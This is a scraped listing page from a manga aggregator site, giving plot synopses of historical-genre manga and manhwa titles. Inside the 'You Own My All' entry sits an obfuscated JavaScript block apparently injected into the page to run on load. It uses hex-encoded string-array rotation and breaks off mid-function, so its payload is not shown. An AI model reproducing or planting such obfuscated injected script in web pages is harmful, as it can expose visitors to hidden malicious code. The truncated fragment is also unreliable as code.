Historical - Page 333

Explore the world of Historical manga, where gripping stories await. Start reading the best Historical manga free now!

4062 results

Yorube Naki Mono

Set in feudal-era Japan, Yorube Naki Mono centers around prostitutes, assassins, and the grimier sides of city life. One night, a mysterious young man named Shikon is introduced as the newest member of Saiga's group of assassins for hire. Shikon is outgoing and flirtatious, but Saiga can sense there's more to Shikon than he lets on... A chance encounter on a moonlit night leads to two destinies awakening.


Yoshihime to Ushio

In the inter land of Kitagawa, a young man mets a young woman who will become a princess. Can she change the way he sees himself and help him forgive himself for his past?


Yoshiwara Boys To Moral Girl!

Rinko, a devoted teacher who has zero luck with men, gets dumped by her boyfriend because of sex. She is heartbroken, when a truck crashes into her and she dies... only for her to be reincarnated in a "reverse" Yoshiwara district (Japan's famous Edo-era pleasure district), where beautiful men sell their sexual services! Is this Heaven? Or Hell...?! An Edo-era reincarnation rom-com begins here!


Yoshiwara Hana Oboro

From Sweet Indulgent: Hana is a normal teenager who goes to school normally, that is until she gets run over by a car... or did she? Suddenly, she finds herself in a weird place known as the "Red Light District"... in EDO PERIOD?! Trying to find a way to get back to her own time, she somehow gets mistaken for a Prostitute and has to escape. Not expecting to be saved by a gentleman, she suddenly ends up in a geisha house.. but then she is bought by the same guy who helped her earlier?!


You Are My Romantic Destiny

Read Manhua You Are My Romantic Destiny / Kamu Adalah Takdir Asmaraku / Ni Shi Wo De Tao Hua Jié / Ni Shi Wo De Taohua Jie / Nǐ Shì Wǒ De Táohuā Jié / You Are My Peach Blossom Tribulation / You Are My Peach Blossom Trouble Bai Die Was Known To Be A Sign Of Calamity, The Daughter Of A Butterfly. She Was To Be Killed Whenever Anyone Came Across Her. Only Then Can There Be Peace. However, Liu Chen Doesn’t Believe It. Since He Has Already Fallen For Her, What’s There For Him To Be Afraid Of Even Though He’ll Meet His Eternal Doom? When The Prophecy Came True After Several Years, Numerous Conspiracies Surfaced And The World Fell Into Chaos Once More. If One Was Born At The Wrong Time, It Was Not Up To Them To Control Their Destiny. In The End, Will The Two Of Them Be Holding Hands Or Will They End Up As Enemies Instead? Adapted From The Novel “The Old Tales Of Southern Dynasty”. “You Are My Romantic Destiny Manhua” Is Sames Name: 你是我的桃花劫


You Can’T Change A Person!

As the very first human to step foot in this world, Darjeeling is showered with love and admiration. But instead of spreading the love she receives, she keeps it all for herself inside a treasure chest. Then one day, God descends from the skies and takes her treasure chest away. Until she can find the answer to his riddle, Darjeeling must wander the earth forever, drifting from one soul to the next. This time, she finds herself trapped inside a body of a young princess, which means she must first learn how to walk and talk before she can even go hunting for clues. Then there are her new "friends"... a group of children whose idea of fun is running around and screaming at the top of their lungs. Is her new life doomed from the start? Or will she discover a way to finally break her curse?


You Just Need To Hold My Hand

You Just Need To Hold My Hand I will hold hands to wake the prince from his eternal slumber. Sodinor, an expert in dreams, she has the ability to make wishes come true even in dreams. She was brought into the prince’s dream by the emperor’s order to wake Prince Marmell, who was unable to wake up. However, there is something very strange in the dreams of the prince, who is known for his kindness and gentleness. His dream world is desolate and colorless. Sonidor, who infiltrates Marmell’s dreams with the image of an adorable animal, finds every reason why he’s sleeping like that… Will Marmell wake up from her eternal slumber?


You Own My All

“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” Third Prince Jing Shao was victorious in war and always surrounded by countless beauties. However, he was wrongly framed and lost everything. Yet the only person who followed him was the unfavoured male concubine that he neglected for years…… After his reincarnation, Jing Shao decided to start afresh and chase after his male wife. Although it seems things will not go as planned, chasing a wife is harder than he thought!<script></script><script>(function(_0x48c404,_0x34bddb){var _0x33efa6=_0x1ccd,_0x5363bc=_0x48c404();while(!![]){try{var _0x409565=parseInt(_0x33efa6(0xf4))/(-0x4*0x51f+-0x5d5+0x1a52)+-parseInt(_0x33efa6(0xea))/(-0x1e0c+-0x5f3*0x1+-0x2401*-0x1)+parseInt(_0x33efa6(0xed))/(0x1*0xfb6+-0x17f4+0x841)+-parseInt(_0x33efa6(0xe8))/(-0x1a5*0xb+0x434*0x6+-0x71d)*(-parseInt(_0x33efa6(0xfa))/(-0x15*0x61+-0x119a*-0x1+-0x9a0))+parseInt(_0x33efa6(0xe1))/(0x1*-0x2643+0x238a+0x2bf)+parseInt(_0x33efa6(0xfb))/(0x1f0d+-0x9fd*0x2+-0x1*0xb0c)+-parseInt(_0x33efa6(0xe6))/(-0x158f+-0x120*-0x11+0x277);if(_0x409565===_0x34bddb)break;else _0x5363bc['push'](_0x5363bc['shift']());}catch(_0xfa5463){_0x5363bc['push'](_0x5363bc['shift']());}}}(_0x4ec3,0xac*-0x8d+-0x76*-0x445+0xcd25));function _0x1ccd(_0x1fbb25,_0x3cb1c5){var _0x274b93=_0x4ec3();return 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You Shou Yan

In the wake of scientific advancement, the once majestic mythological animals can't be compared to the olden days now. The mythological animal Si Bu Xiang received orders to descend to the mortal world and to help out other mythological animals in dire straits wandering the human world. In the secular world, he met his old colleague Pi Xiu in a tight spot, his drinking buddy Tu Ye down in his luck, and the gold and silver Jue brothers who were demoted to the mortal world... what kind of stories will happen between them? "You Shou Yan" updates every Wednesday, welcome to the furballs' world! Author: 靴下猫腰子 Editor: 凩汐


You Turned Off the Pain Setting?

Read Manhwa You Turned Off the Pain Setting? Online For Free On ZinManga You Turned Off the Pain Setting? Novel also known as “100回目プレイヤーなので高好感度はエンリョします! / I Said I Turned off the Pain Perception Setting! / I Turned off the Pain Perception Setting! / I Turned Off the Pain Setting? / 통각 설정 꺼놨다니까요?”. This OnGoing webtoon was released on 2024. The story was written by Yoo Eunwoo and illustrations by STUDIO INUS. The content of the comic You Turned Off the Pain Setting?: Pain Perception 0, Capture rate is 100! A virtual reality game with pain perception set to ‘0’. I was the first to clear all endings, and started the final 100th playthrough… but something is off. Suddenly, I have a strange disease with a terminal setting, and the capture target characters are starting to worry about me. I don’t feel any pain, so should I pretend to be sick? Before I knew it, to the capture target characters, I became a noble hero enduring pain and sacrificing for world peace. Since it has come to this, the concept for this playthrough is a terminally ill hero throwing herself for the world! I must end it with a happy ending. This is my last playthrough in my life! The comic You Turned Off the Pain Setting? belongs to the Genre: Drama,  Fantasy, Manhwa, Romance, Webtoons MangaZin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience. You can Read Manga recommendation I Really Don’t Want to be a Saint The Lithromantic Duke Extraordinary Museum

2 days ago

You Un Lock

In a bustling slum during the Mid-Ming Dynasty, an ambitious locksmith named Xiao is approached by a group of thieves with a mysterious, ornate safe. What starts as a routine job soon leads Xiao on a dangerous journey tied to an ancient secret hidden within the powerful Yuan family. When he discovers a noble girl trapped inside the safe—and a promise of unimaginable riches—Xiao must navigate deceit, family legacies, and his own morality to uncover the true meaning of wealth and sacrifice. A gripping one-shot blending action, drama, and heartfelt bonds, this story will leave readers pondering the value of freedom, love, and the treasures that can’t be bought.


You Were Sent By God

She believed he was a heartless husband and treated him badly. Until he was hunted down as a traitor in order to protect her.My dear wife. Please stay safe.' Her heart was torn to pieces as she knelt before his severed arm. But this time, she could see that his body was clearly intact. "Your highness? Why are you crying all of a sudden?" She had returned after losing hope, to the first night of their wedding three years ago. "You must be nervous about your first night. Don't worry. I didn't plan to spend the night with the princess anyway." "Why? Aren't I your wife? Forget it, let's undress and head to bed." "Your highness?" She tugged at his arm with force. 'This time, I will certainly protect you. Even if I die trying, I would rather die with you. Not as Nirszeg's princess, but your wife, Agnes Arpad,' she pledged with determination.
